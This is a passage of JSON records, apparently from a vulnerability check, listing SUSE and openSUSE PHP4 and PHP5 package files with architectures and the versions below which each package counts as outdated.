"packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-bcmath-5.1.2-29.14.ppc.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "i586", "packageFilename": "apache2-mod_php4-4.4.0-6.18.i586.rpm", "packageName": "apache2-mod_php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "ppc", "packageFilename": "php5-5.0.4-9.17.ppc.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-ldap-5.1.2-29.14.ppc.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "i586", "packageFilename": "php5-exif-5.0.4-9.17.i586.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-pdo-5.1.2-29.14.s390x.rpm", "packageName": "php5-pdo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "i586", "packageFilename": "php4-pgsql-4.3.8-8.31.i586.rpm", "packageName": "php4-pgsql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "x86_64", "packageFilename": "mod_php4-servlet-4.3.10-14.28.x86_64.rpm", "packageName": "mod_php4-servlet", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-iconv-5.1.2-29.14.s390x.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-pgsql-5.1.2-29.14.x86_64.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "x86_64", "packageFilename": "php5-gd-5.0.4-9.17.x86_64.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-gd-5.1.2-29.14.s390x.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-wddx-5.1.2-29.14.i586.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "x86_64", "packageFilename": "php4-wddx-4.3.10-14.28.x86_64.rpm", "packageName": "php4-wddx", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "i586", "packageFilename": "apache2-mod_php5-5.0.4-9.17.i586.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-gd-5.1.2-29.14.i586.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "ppc", "packageFilename": "php5-dom-5.0.4-9.17.ppc.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-soap-5.1.2-29.14.i586.rpm", "packageName": "php5-soap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-mbstring-5.1.2-29.14.ia64.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "x86_64", "packageFilename": "php4-fastcgi-4.3.10-14.28.x86_64.rpm", "packageName": "php4-fastcgi", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "i586", "packageFilename": "php5-curl-5.0.3-14.27.i586.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-pear-5.1.2-29.14.s390x.rpm", "packageName": "php5-pear", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-xmlrpc-5.1.2-29.14.i586.rpm", "packageName": "php5-xmlrpc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-5.1.2-29.14.i586.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-soap-5.1.2-29.14.ppc.rpm", "packageName": "php5-soap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-pear-5.1.2-29.14.ppc.rpm", "packageName": "php5-pear", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-dba-5.1.2-29.14.i586.rpm", "packageName": "php5-dba", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-exif-5.1.2-29.14.i586.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "ppc", "packageFilename": "php5-pgsql-5.0.4-9.17.ppc.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "x86_64", "packageFilename": "php5-pear-5.0.4-9.17.x86_64.rpm", "packageName": "php5-pear", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "x86_64", "packageFilename": "php5-mbstring-5.0.4-9.17.x86_64.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-mysql-5.1.2-29.14.x86_64.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "ppc", "packageFilename": "php5-pear-5.0.4-9.17.ppc.rpm", "packageName": "php5-pear", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-ldap-5.1.2-29.14.ia64.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-5.1.2-29.14.ppc.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "x86_64", "packageFilename": "php4-curl-4.3.8-8.31.x86_64.rpm", "packageName": "php4-curl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-dba-5.1.2-29.14.x86_64.rpm", "packageName": "php5-dba", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-mysqli-5.1.2-29.14.s390x.rpm", "packageName": "php5-mysqli", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-bcmath-5.1.2-29.14.ia64.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "i586", "packageFilename": "php5-mbstring-5.0.3-14.27.i586.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "i586", "packageFilename": "php5-gd-5.0.3-14.27.i586.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-curl-5.1.2-29.14.i586.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-ldap-5.1.2-29.14.s390x.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "9.2-200609011520", "arch": "x86_64", "packageFilename": "php4-32bit-9.2-200609011520.x86_64.rpm", "packageName": "php4-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "x86_64", "packageFilename": "php4-servlet-4.4.0-6.18.x86_64.rpm", "packageName": "php4-servlet", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-soap-5.1.2-29.14.ppc.rpm", "packageName": "php5-soap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-bcmath-5.1.2-29.14.s390x.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "apache2-mod_php5-5.1.2-29.14.i586.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-5.1.2-29.14.x86_64.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-dba-5.1.2-29.14.x86_64.rpm", "packageName": "php5-dba", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-fastcgi-5.1.2-29.14.ppc.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "i586", "packageFilename": "php4-4.3.10-14.28.i586.rpm", "packageName": "php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-mbstring-5.1.2-29.14.ppc.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "i586", "packageFilename": "php4-imap-4.3.10-14.28.i586.rpm", "packageName": "php4-imap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "i586", "packageFilename": "php5-soap-5.0.3-14.27.i586.rpm", "packageName": "php5-soap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "x86_64", "packageFilename": "php5-wddx-5.0.4-9.17.x86_64.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-dom-5.1.2-29.14.x86_64.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "i586", "packageFilename": "php4-4.3.8-8.31.i586.rpm", "packageName": "php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "i586", "packageFilename": "php5-pear-5.0.3-14.27.i586.rpm", "packageName": "php5-pear", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "i586", "packageFilename": "php4-gd-4.3.8-8.31.i586.rpm", "packageName": "php4-gd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "x86_64", "packageFilename": "apache2-mod_php4-4.3.8-8.31.x86_64.rpm", "packageName": "apache2-mod_php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-pear-5.1.2-29.14.x86_64.rpm", "packageName": "php5-pear", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-exif-5.1.2-29.14.i586.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-mysql-5.1.2-29.14.ia64.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-dba-5.1.2-29.14.ppc.rpm", "packageName": "php5-dba", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-5.1.2-29.14.x86_64.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-curl-5.1.2-29.14.x86_64.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "i586", "packageFilename": "php5-imap-5.0.3-14.27.i586.rpm", "packageName": "php5-imap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "apache2-mod_php5-5.1.2-29.14.x86_64.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-mysql-5.1.2-29.14.ppc.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "i586", "packageFilename": "php4-gd-4.3.10-14.28.i586.rpm", "packageName": "php4-gd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-pdo-5.1.2-29.14.i586.rpm", "packageName": "php5-pdo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-devel-5.1.2-29.14.s390x.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-ldap-5.1.2-29.14.i586.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "apache2-mod_php5-5.1.2-29.14.i586.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "i586", "packageFilename": "php5-5.0.3-14.27.i586.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-soap-5.1.2-29.14.x86_64.rpm", "packageName": "php5-soap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-pear-5.1.2-29.14.s390x.rpm", "packageName": "php5-pear", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-imap-5.1.2-29.14.s390x.rpm", "packageName": "php5-imap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "i586", "packageFilename": "php5-iconv-5.0.4-9.17.i586.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-bcmath-5.1.2-29.14.x86_64.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-mysqli-5.1.2-29.14.i586.rpm", "packageName": "php5-mysqli", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "x86_64", "packageFilename": "php5-xmlrpc-5.0.3-14.27.x86_64.rpm", "packageName": "php5-xmlrpc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "x86_64", "packageFilename": "php4-sysvshm-4.3.8-8.31.x86_64.rpm", "packageName": "php4-sysvshm", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-dba-5.1.2-29.14.i586.rpm", "packageName": "php5-dba", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-mysql-5.1.2-29.14.i586.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-soap-5.1.2-29.14.s390x.rpm", "packageName": "php5-soap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-gd-5.1.2-29.14.ppc.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "apache2-mod_php5-5.1.2-29.14.ppc.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-iconv-5.1.2-29.14.x86_64.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "i586", "packageFilename": "php4-servlet-4.4.0-6.18.i586.rpm", "packageName": "php4-servlet", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-iconv-5.1.2-29.14.ppc.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-dom-5.1.2-29.14.ia64.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "apache2-mod_php5-5.1.2-29.14.ppc.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "i586", "packageFilename": "php5-bcmath-5.0.3-14.27.i586.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "ppc", "packageFilename": "php5-mysqli-5.0.4-9.17.ppc.rpm", "packageName": "php5-mysqli", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-devel-5.1.2-29.14.x86_64.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "i586", "packageFilename": "php5-devel-5.0.3-14.27.i586.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-pear-5.1.2-29.14.ppc.rpm", "packageName": "php5-pear", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "ppc", "packageFilename": "php4-wddx-4.4.0-6.18.ppc.rpm", "packageName": "php4-wddx", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-fastcgi-5.1.2-29.14.i586.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "i586", "packageFilename": "php5-mysql-5.0.4-9.17.i586.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "i586", "packageFilename": "php4-pgsql-4.4.0-6.18.i586.rpm", "packageName": "php4-pgsql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-iconv-5.1.2-29.14.s390x.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-fastcgi-5.1.2-29.14.s390x.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-dom-5.1.2-29.14.s390x.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-ftp-5.1.2-29.14.s390x.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "x86_64", "packageFilename": "php5-iconv-5.0.3-14.27.x86_64.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "i586", "packageFilename": "php4-pear-4.3.8-8.31.i586.rpm", "packageName": "php4-pear", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-curl-5.1.2-29.14.ia64.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-gd-5.1.2-29.14.x86_64.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "i586", "packageFilename": "php4-curl-4.4.0-6.18.i586.rpm", "packageName": "php4-curl", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "i586", "packageFilename": "php4-mbstring-4.3.8-8.31.i586.rpm", "packageName": "php4-mbstring", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "i586", "packageFilename": "php4-gd-4.4.0-6.18.i586.rpm", "packageName": "php4-gd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "ppc", "packageFilename": "php4-gd-4.4.0-6.18.ppc.rpm", "packageName": "php4-gd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-ftp-5.1.2-29.14.x86_64.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "x86_64", "packageFilename": "php5-pgsql-5.0.3-14.27.x86_64.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-exif-5.1.2-29.14.s390x.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-mbstring-5.1.2-29.14.i586.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-exif-5.1.2-29.14.x86_64.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "x86_64", "packageFilename": "php4-fastcgi-4.3.8-8.31.x86_64.rpm", "packageName": "php4-fastcgi", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "i586", "packageFilename": "php5-wddx-5.0.3-14.27.i586.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-dom-5.1.2-29.14.i586.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-ftp-5.1.2-29.14.i586.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "x86_64", "packageFilename": "php4-exif-4.3.10-14.28.x86_64.rpm", "packageName": "php4-exif", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-pear-5.1.2-29.14.i586.rpm", "packageName": "php5-pear", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-imap-5.1.2-29.14.i586.rpm", "packageName": "php5-imap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "x86_64", "packageFilename": "php4-devel-4.3.8-8.31.x86_64.rpm", "packageName": "php4-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "i586", "packageFilename": "php4-fastcgi-4.4.0-6.18.i586.rpm", "packageName": "php4-fastcgi", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-dba-5.1.2-29.14.i586.rpm", "packageName": "php5-dba", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-dba-5.1.2-29.14.ppc.rpm", "packageName": "php5-dba", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "i586", "packageFilename": "php5-fastcgi-5.0.3-14.27.i586.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "i586", "packageFilename": "php5-dba-5.0.3-14.27.i586.rpm", "packageName": "php5-dba", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-ldap-5.1.2-29.14.i586.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "x86_64", "packageFilename": "php5-curl-5.0.4-9.17.x86_64.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-iconv-5.1.2-29.14.ppc.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "ppc", "packageFilename": "php5-gd-5.0.4-9.17.ppc.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "i586", 